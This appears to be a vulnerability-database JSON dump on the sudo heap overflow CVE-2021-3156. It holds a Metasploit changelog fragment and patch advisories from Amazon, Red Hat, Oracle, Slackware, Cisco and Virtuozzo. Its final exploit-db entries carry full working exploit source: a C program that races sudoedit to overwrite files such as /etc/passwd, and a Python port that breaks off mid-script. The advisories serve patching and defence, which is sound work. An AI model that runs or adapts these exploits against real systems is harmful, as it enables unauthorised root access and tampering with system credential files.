Examples include notifying the user that the database needs to be active, and having JohnTheRipper Jumbo patch installed\n * [#14685](<https://github.com/rapid7/metasploit-framework/pull/14685>) from [geyslan](<https://github.com/geyslan>) Reduced the size of the `linux/x64/shell_bind_tcp_random_port` payload while maintaining the functionality.\n * [#14708](<https://github.com/rapid7/metasploit-framework/pull/14708>) from [timwr](<https://github.com/timwr>) Add offsets to the `exploit/osx/browser/safari_proxy_object_type_confusion` exploit module for Mac OSX 10.13.1 and 10.13.2.\n * [#14721](<https://github.com/rapid7/metasploit-framework/pull/14721>) from [bcoles](<https://github.com/bcoles>) This adds a target for Debian 10 to the sudo exploit [CVE-2021-3156](<https://attackerkb.com/topics/krVyNG9US8/cve-2021-3156-baron-samedit?referrer=blog>).\n * [#14728](<https://github.com/rapid7/metasploit-framework/pull/14728>) from [FireFart](<https://github.com/FireFart>) Updates have been made to `lib/msf/core/module/reference.rb` as well as associated tools and documentation to update old WPVDB links with the new WPVDB domain and to also ensure that the new URL format is properly checked in the respective tools.\n * [#14725](<https://github.com/rapid7/metasploit-framework/pull/14725>) by [h00die](<https://github.com/h00die>) moves creds to a default-cred "userpass" list instead of splitting known cred pairs across files.\n\n## Bugs fixed\n\n * [#14714](<https://github.com/rapid7/metasploit-framework/pull/14714>) from [adfoster-r7](<https://github.com/adfoster-r7>) Updates the sqlite gem in preparation for Ruby 3.0 support & fixes SQLite3 deprecation warning.\n * [#14720](<https://github.com/rapid7/metasploit-framework/pull/14720>) from [dwelch-r7](<https://github.com/dwelch-r7>) Fixed an issue in the `lib/msf/core/exploit/remote/http_client.rb` and `lib/msf/core/opt_http_rhost_url.rb` libraries where the `VHOST` datastore variable would be set incorrectly if a user 
used an `/etc/hosts` entry for resolving a hostname to an IP address.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` and you can get more details on the changes since the last blog post from GitHub:\n\n * [Pull Requests 6.0.29...6.0.30](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-02-04T11%3A13%3A25-06%3A00..2021-02-11T08%3A23%3A00-06%3A00%22>)\n * [Full diff 6.0.29...6.0.30](<https://github.com/rapid7/metasploit-framework/compare/6.0.29...6.0.30>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. To install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the [binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "modified": "2021-02-12T19:26:37", "published": "2021-02-12T19:26:37", "id": "RAPID7BLOG:8F65784C67333FC453D98DBB9FBEBA4C", "href": "https://blog.rapid7.com/2021/02/12/metasploit-wrap-up-98/", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "virtuozzo": [{"lastseen": "2021-02-04T17:17:54", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The update fixes the vulnerability in sudo registered as CVE-2021-3156. The new sudo packages are available for Virtuozzo Hybrid Server 7.x and Virtuozzo 6.\n**Vulnerability id:** CVE-2021-3156\nA flaw was found in sudo. A heap-based buffer overflow was found in the way sudo parses command line arguments. This flaw is exploitable by any local user who can execute the sudo command (by default, any local user can execute sudo) without authentication. Successful exploitation of this flaw could lead to privilege escalation. 
The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n\n", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "VZA-2021-004", "href": "https://help.virtuozzo.com/s/article/VZA-2021-004", "title": "[Important] [Security] Fix for a vulnerability in sudo, CVE-2021-3156, for Virtuozzo Hybrid Server 7.x and Virtuozzo 6", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T17:18:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "This update provides a security fix.\n**Vulnerability id:** VSTOR-40614\nFix for a vulnerability in sudo known as CVE-2021-3156.\n\n", "edition": 3, "modified": "2020-02-03T00:00:00", "published": "2020-02-03T00:00:00", "id": "VZA-2021-005", "href": "https://help.virtuozzo.com/s/article/VZA-2021-005", "title": "[Important] [Security] Virtuozzo Hybrid Infrastructure 4.0 Update 1.2 (4.0.1-49)", "type": "virtuozzo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "amazon": [{"lastseen": "2021-02-04T15:43:18", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "**Issue Overview:**\n\nWhen sudo runs a command in shell mode, either via the -s or -i command line option, it escapes special characters in the command's arguments with a backslash. The sudoers policy plugin will then remove the escape characters from the arguments before evaluating the sudoers policy (which doesn't expect the escape characters) if the command is being run in shell mode. ([CVE-2021-3156 __](<https://access.redhat.com/security/cve/CVE-2021-3156>))\n\n \n**Affected Packages:** \n\n\nsudo\n\n \n**Issue Correction:** \nRun _yum update sudo_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n i686: \n sudo-debuginfo-1.8.23-9.56.amzn1.i686 \n sudo-devel-1.8.23-9.56.amzn1.i686 \n sudo-1.8.23-9.56.amzn1.i686 \n \n src: \n sudo-1.8.23-9.56.amzn1.src \n \n x86_64: \n sudo-1.8.23-9.56.amzn1.x86_64 \n sudo-devel-1.8.23-9.56.amzn1.x86_64 \n sudo-debuginfo-1.8.23-9.56.amzn1.x86_64 \n \n \n", "edition": 2, "modified": "2021-01-26T00:11:00", "published": "2021-01-26T00:11:00", "id": "ALAS-2021-1478", "href": "https://alas.aws.amazon.com/ALAS-2021-1478.html", "title": "Important: sudo", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T15:40:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "**Issue Overview:**\n\nWhen sudo runs a command in shell mode, either via the -s or -i command line option, it escapes special characters in the command's arguments with a backslash. The sudoers policy plugin will then remove the escape characters from the arguments before evaluating the sudoers policy (which doesn't expect the escape characters) if the command is being run in shell mode. ([CVE-2021-3156 __](<https://access.redhat.com/security/cve/CVE-2021-3156>))\n\n \n**Affected Packages:** \n\n\nsudo\n\n \n**Issue Correction:** \nRun _yum update sudo_ to update your system. 
\n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n sudo-1.8.23-4.amzn2.2.1.aarch64 \n sudo-devel-1.8.23-4.amzn2.2.1.aarch64 \n sudo-debuginfo-1.8.23-4.amzn2.2.1.aarch64 \n \n i686: \n sudo-1.8.23-4.amzn2.2.1.i686 \n sudo-devel-1.8.23-4.amzn2.2.1.i686 \n sudo-debuginfo-1.8.23-4.amzn2.2.1.i686 \n \n src: \n sudo-1.8.23-4.amzn2.2.1.src \n \n x86_64: \n sudo-1.8.23-4.amzn2.2.1.x86_64 \n sudo-devel-1.8.23-4.amzn2.2.1.x86_64 \n sudo-debuginfo-1.8.23-4.amzn2.2.1.x86_64 \n \n \n", "edition": 2, "modified": "2021-01-25T23:09:00", "published": "2021-01-25T23:09:00", "id": "ALAS2-2021-1590", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1590.html", "title": "Important: sudo", "type": "amazon", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2021-02-04T11:50:32", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:30:22", "published": "2021-01-26T23:57:03", "id": "RHSA-2021:0219", "href": "https://access.redhat.com/errata/RHSA-2021:0219", "type": "redhat", "title": "(RHSA-2021:0219) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:00", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management 
purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:16:25", "published": "2021-01-26T23:56:10", "id": "RHSA-2021:0226", "href": "https://access.redhat.com/errata/RHSA-2021:0226", "type": "redhat", "title": "(RHSA-2021:0226) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:33", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:37:18", "published": "2021-01-27T00:01:35", "id": "RHSA-2021:0224", "href": "https://access.redhat.com/errata/RHSA-2021:0224", "type": "redhat", "title": "(RHSA-2021:0224) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:51:02", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more 
details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:46:39", "published": "2021-01-26T23:54:37", "id": "RHSA-2021:0221", "href": "https://access.redhat.com/errata/RHSA-2021:0221", "type": "redhat", "title": "(RHSA-2021:0221) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:12", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:55:03", "published": "2021-01-26T23:59:36", "id": "RHSA-2021:0222", "href": "https://access.redhat.com/errata/RHSA-2021:0222", "type": "redhat", "title": "(RHSA-2021:0222) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:49:13", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) 
listed in the References section.", "modified": "2021-01-27T00:16:10", "published": "2021-01-26T23:53:36", "id": "RHSA-2021:0218", "href": "https://access.redhat.com/errata/RHSA-2021:0218", "type": "redhat", "title": "(RHSA-2021:0218) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:49:14", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:16:29", "published": "2021-01-26T23:57:45", "id": "RHSA-2021:0220", "href": "https://access.redhat.com/errata/RHSA-2021:0220", "type": "redhat", "title": "(RHSA-2021:0220) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:49:34", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:30:07", "published": "2021-01-27T00:02:19", "id": "RHSA-2021:0225", "href": 
"https://access.redhat.com/errata/RHSA-2021:0225", "type": "redhat", "title": "(RHSA-2021:0225) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:46", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:55:04", "published": "2021-01-27T00:00:30", "id": "RHSA-2021:0223", "href": "https://access.redhat.com/errata/RHSA-2021:0223", "type": "redhat", "title": "(RHSA-2021:0223) Important: sudo security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T11:50:51", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "The sudo packages contain the sudo utility which allows system administrators to provide certain users with the permission to execute privileged commands, which are used for system management purposes, without having to log in as root.\n\nSecurity Fix(es):\n\n* sudo: Heap buffer overflow in argument parsing (CVE-2021-3156)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", "modified": "2021-01-27T00:21:54", "published": "2021-01-26T23:52:40", "id": "RHSA-2021:0227", "href": "https://access.redhat.com/errata/RHSA-2021:0227", "type": "redhat", "title": "(RHSA-2021:0227) Important: sudo security update", "cvss": {"score": 
7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2021-02-04T15:33:13", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "[1.8.6p3-29.0.2.el6_10.3]\n- backport the fix CVE-2021-3156.patch from ol7.", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "ELSA-2021-9019", "href": "http://linux.oracle.com/errata/ELSA-2021-9019.html", "title": "sudo security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T15:37:26", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "[1.8.23-10.1]\n- RHEL 7.9.Z ERRATUM\n- CVE-2021-3156\nResolves: rhbz#1917729", "edition": 3, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "ELSA-2021-0221", "href": "http://linux.oracle.com/errata/ELSA-2021-0221.html", "title": "sudo security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-04T15:36:37", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "[1.8.29-6.1]\n- RHEL 8.3.Z ERRATUM\n- CVE-2021-3156\nResolves: rhbz#1917732", "edition": 2, "modified": "2021-01-27T00:00:00", "published": "2021-01-27T00:00:00", "id": "ELSA-2021-0218", "href": "http://linux.oracle.com/errata/ELSA-2021-0218.html", "title": "sudo security update", "type": "oraclelinux", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2021-02-04T12:03:45", "bulletinFamily": "unix", "cvelist": ["CVE-2021-3156"], "description": "New sudo packages are available for Slackware 14.0, 14.1, 14.2, and -current to\nfix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/sudo-1.9.5p2-i586-1_slack14.2.txz: Upgraded.\n When invoked as sudoedit, the same set of command line options\n are now accepted as for \"sudo -e\". 
The -H and -P options are\n now rejected for sudoedit and \"sudo -e\" which matches the sudo\n 1.7 behavior. This is part of the fix for CVE-2021-3156.\n Fixed a potential buffer overflow when unescaping backslashes\n in the command's arguments. Normally, sudo escapes special\n characters when running a command via a shell (sudo -s or sudo\n -i). However, it was also possible to run sudoedit with the -s\n or -i flags in which case no escaping had actually been done,\n making a buffer overflow possible. This fixes CVE-2021-3156.\n For more information, see:\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3156\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/sudo-1.9.5p2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/sudo-1.9.5p2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/sudo-1.9.5p2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/sudo-1.9.5p2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/sudo-1.9.5p2-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/sudo-1.9.5p2-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/ap/sudo-1.9.5p2-i586-1.txz\n\nUpdated package for Slackware 
x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/ap/sudo-1.9.5p2-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg sudo-1.9.5p2-i586-1_slack14.2.txz", "modified": "2021-01-26T21:34:51", "published": "2021-01-26T21:34:51", "id": "SSA-2021-026-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2021&m=slackware-security.461226", "type": "slackware", "title": "[slackware-security] sudo", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisco": [{"lastseen": "2021-02-22T22:34:51", "bulletinFamily": "software", "cvelist": ["CVE-2021-3156"], "description": "A vulnerability in the command line parameter parsing code of Sudo could allow an authenticated, local attacker to execute commands or binaries with root privileges.\n\nThe vulnerability is due to improper parsing of command line parameters that may result in a heap-based buffer overflow. An attacker could exploit this vulnerability by accessing a Unix shell on an affected device and then invoking the sudoedit command with crafted parameters or by executing a binary exploit. 
A successful exploit could allow the attacker to execute commands or binaries with root privileges.\n\nThis advisory is available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM\"]", "modified": "2021-02-22T21:38:52", "published": "2021-01-29T21:30:00", "id": "CISCO-SA-SUDO-PRIVESC-JAN2021-QNYQFCM", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sudo-privesc-jan2021-qnYQfcM", "type": "cisco", "title": "Sudo Privilege Escalation Vulnerability Affecting Cisco Products: January 2021", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2021-02-03T20:28:36", "description": "", "published": "2021-02-03T00:00:00", "type": "exploitdb", "title": "Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-03T00:00:00", "id": "EDB-ID:49522", "href": "https://www.exploit-db.com/exploits/49522", "sourceData": "# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)\r\n# Authors and Contributors: cts, help from r4j, debug by nu11secur1ty\r\n# Date: 30.01.2021\r\n# Vendor: https://www.sudo.ws/\r\n# Link: https://www.sudo.ws/download.html\r\n# CVE: CVE-2021-3156\r\n\r\n[+] Source: https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-3156/1.30.2021\r\n\r\n[Exploit Program Code]\r\n\r\n// Exploit by @gf_256 aka cts\r\n// With help from r4j\r\n// Debug by @nu11secur1ty\r\n// Original advisory by Baron Samedit of Qualys\r\n\r\n// Tested on Ubuntu 18.04 and 20.04 & 20.04.01\r\n// You will probably need to adjust RACE_SLEEP_TIME.\r\n\r\n#include <stdio.h>\r\n#include <stdint.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include 
<stdlib.h>\r\n#include <assert.h>\r\n#include <unistd.h>\r\n#include <sys/wait.h>\r\n#include <sys/types.h>\r\n#include <sys/resource.h>\r\n#include <sys/stat.h>\r\n#include <unistd.h>\r\n#include <fcntl.h>\r\n#include <pwd.h>\r\n\r\n// !!! best value of this varies from system-to-system !!!\r\n// !!! you will probably need to tune this !!!\r\n#define RACE_SLEEP_TIME 10000\r\n\r\nchar *target_file;\r\nchar *src_file;\r\n\r\nsize_t query_target_size()\r\n{\r\n struct stat st;\r\n stat(target_file, &st);\r\n return st.st_size;\r\n}\r\n\r\nchar* read_src_contents()\r\n{\r\n FILE* f = fopen(src_file, \"rb\");\r\n if (!f) {\r\n puts(\"oh no baby what are you doing :(\");\r\n abort();\r\n }\r\n fseek(f, 0, SEEK_END);\r\n long fsize = ftell(f);\r\n fseek(f, 0, SEEK_SET);\r\n char *content = malloc(fsize + 1);\r\n fread(content, 1, fsize, f);\r\n fclose(f);\r\n return content;\r\n}\r\n\r\nchar* get_my_username()\r\n{\r\n // getlogin can return incorrect result (for example, root under su)!\r\n struct passwd *pws = getpwuid(getuid());\r\n return strdup(pws->pw_name);\r\n}\r\n\r\nint main(int my_argc, char **my_argv)\r\n{\r\n puts(\"CVE-2021-3156 PoC by @gf_256\");\r\n puts(\"original advisory by Baron Samedit\");\r\n\r\n if (my_argc != 3) {\r\n puts(\"./meme <target file> <src file>\");\r\n puts(\"Example: ./meme /etc/passwd my_fake_passwd_file\");\r\n return 1;\r\n }\r\n target_file = my_argv[1];\r\n src_file = my_argv[2];\r\n printf(\"we will overwrite %s with stuff from %s\\n\", target_file, src_file);\r\n\r\n char* myusername = get_my_username();\r\n printf(\"hi, my name is %s\\n\", myusername);\r\n\r\n size_t initial_size = query_target_size();\r\n printf(\"%s is %zi big right now\\n\", target_file, initial_size);\r\n\r\n char* stuff_to_write = read_src_contents();\r\n\r\n char memedir[1000];\r\n char my_symlink[1000];\r\n char overflow[1000];\r\n\r\n char* bigstuff = calloc(1,0x10000);\r\n memset(bigstuff, 'A', 0xffff); // need a big shit in the stack so the write 
doesn't fail with bad address\r\n\r\n char *argv[] = {\"/usr/bin/sudoedit\", \"-A\", \"-s\", \"\\\\\", overflow, NULL\r\n };\r\n\r\n char *envp[] = {\r\n \"\\n\\n\\n\\n\\n\", // put some newlines here to separate our real contents from the junk stuff_to_write,\r\n \"SUDO_ASKPASS=/bin/false\", \"LANG=C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\r\n\", bigstuff, NULL\r\n };\r\n\r\n puts(\"ok podracing time bitches\");\r\n\r\n // Boom =)\r\n // for (int i = 0; i < 5000; i++)\r\n for (int i = 0; i < 3000; i++) {\r\n sprintf(memedir, \"ayylmaobigchungussssssssssss00000000000000000000000000%08d\", i);\r\n sprintf(overflow, \"11111111111111111111111111111111111111111111111111111111%s\", memedir);\r\n sprintf(my_symlink, \"%s/%s\", memedir, myusername);\r\n puts(memedir);\r\n\r\n if (access(memedir, F_OK) == 0) {\r\n printf(\"dude, %s already exists, do it from a clean working dir\\n\", memedir);\r\n return 1;\r\n }\r\n\r\n pid_t childpid = fork();\r\n if (childpid) { // parent\r\n usleep(RACE_SLEEP_TIME);\r\n mkdir(memedir, 0700);\r\n symlink(target_file, my_symlink);\r\n waitpid(childpid, 0, 0);\r\n } else { // child\r\n setpriority(PRIO_PROCESS, 0, 20); // set nice to 20 for race reliability\r\n execve(\"/usr/bin/sudoedit\", argv, envp); // noreturn\r\n puts(\"execve fails?!\");\r\n abort();\r\n }\r\n\r\n if (query_target_size() != initial_size) {\r\n puts(\"target file has a BRUH MOMENT!!!! 
SUCCess???\");\r\n system(\"xdg-open 'https://www.youtube.com/watch?v=cj_8X1cyVFc'\");\r\n// ayy lmao\r\n return 0;\r\n }\r\n }\r\n\r\n puts(\"Failed?\");\r\n puts(\"if all the meme dirs are owned by root, the usleep needs to be decreased.\");\r\n puts(\"if they're all owned by you, the usleep needs to be increased\");\r\n\r\n return 0;\r\n}", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/49522"}, {"lastseen": "2021-02-03T20:28:36", "description": "", "published": "2021-02-03T00:00:00", "type": "exploitdb", "title": "Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)", "bulletinFamily": "exploit", "cvelist": ["CVE-2021-3156"], "modified": "2021-02-03T00:00:00", "id": "EDB-ID:49521", "href": "https://www.exploit-db.com/exploits/49521", "sourceData": "# Exploit Title: Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)\r\n# Date: 2021-02-02\r\n# Exploit Author: West Shepherd\r\n# Version: Sudo legacy versions from 1.8.2 to 1.8.31p2, stable versions from 1.9.0 to 1.9.5p1.\r\n# Tested on: Ubuntu 20.04.1 LTS Sudo version 1.8.31\r\n# CVE : CVE-2021-3156\r\n# Credit to: Advisory by Baron Samedit of Qualys and Stephen Tong (stong) for the C based exploit code.\r\n# Sources:\r\n# (1) https://blog.qualys.com/vulnerabilities-research/2021/01/26/cve-2021-3156-heap-based-buffer-overflow-in-sudo-baron-samedit\r\n# (2) https://github.com/stong/CVE-2021-3156\r\n# Requirements: Python3\r\n\r\n#!/usr/bin/python3\r\nimport os\r\nimport pwd\r\nimport time\r\nimport sys\r\nimport argparse\r\n\r\n\r\nclass Exploit(object):\r\n username = ''\r\n size = 0\r\n data = ''\r\n\r\n def __init__(self, source, target, sleep):\r\n self.sleep = sleep\r\n self.source = source\r\n self.target = target\r\n\r\n @staticmethod\r\n def readFile(path):\r\n return open(path, 'r').read()\r\n\r\n @staticmethod\r\n def getUser():\r\n return pwd.getpwuid(os.getuid())[0]\r\n\r\n @staticmethod\r\n def 
getSize(path):\r\n return os.stat(path).st_size\r\n\r\n def main(self):\r\n self.username = self.getUser()\r\n self.data = self.readFile(self.source)\r\n self.size = self.getSize(self.target)\r\n environ = {\r\n '\\n\\n\\n\\n\\n': '\\n' + self.data,\r\n 'SUDO_ASKPASS': '/bin/false',\r\n 'LANG':\r\n'C.UTF-8@aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',\r\n 'A': 'A' * 0xffff\r\n }\r\n for i in range(5000):\r\n directory =\r\n'AAAAAAAAAAAAAAAAAAAAAAAAAAAA00000000000000000000000000%08d' % i\r\n overflow =\r\n'11111111111111111111111111111111111111111111111111111111%s' %\r\ndirectory\r\n\r\n if os.path.exists(directory):\r\n sys.stdout.write('file exists %s\\n' % directory)\r\n continue\r\n\r\n child = os.fork()\r\n os.environ = environ\r\n if child:\r\n sys.stdout.write('[+] parent %d \\n' % i)\r\n sys.stdout.flush()\r\n time.sleep(self.sleep)\r\n if not os.path.exists(directory):\r\n try:\r\n os.mkdir(directory, 0o700)\r\n os.symlink(self.target, '%s/%s' % (directory,\r\nself.username))\r\n os.waitpid(child, 0)\r\n except:\r\n continue\r\n else:\r\n sys.stdout.write('[+] child %d \\n' % i)\r\n sys.stdout.flush()\r\n os.setpriority(os.PRIO_PROCESS, 0, 20)\r\n os.execve(\r\n path='/usr/bin/sudoedit',\r\n argv=[\r\n '/usr/bin/sudoedit',\r\n '-A',\r\n '-s',\r\n '\\\\',\r\n overflow\r\n ],\r\n env=environ\r\n )\r\n sys.stdout.write('[!] 
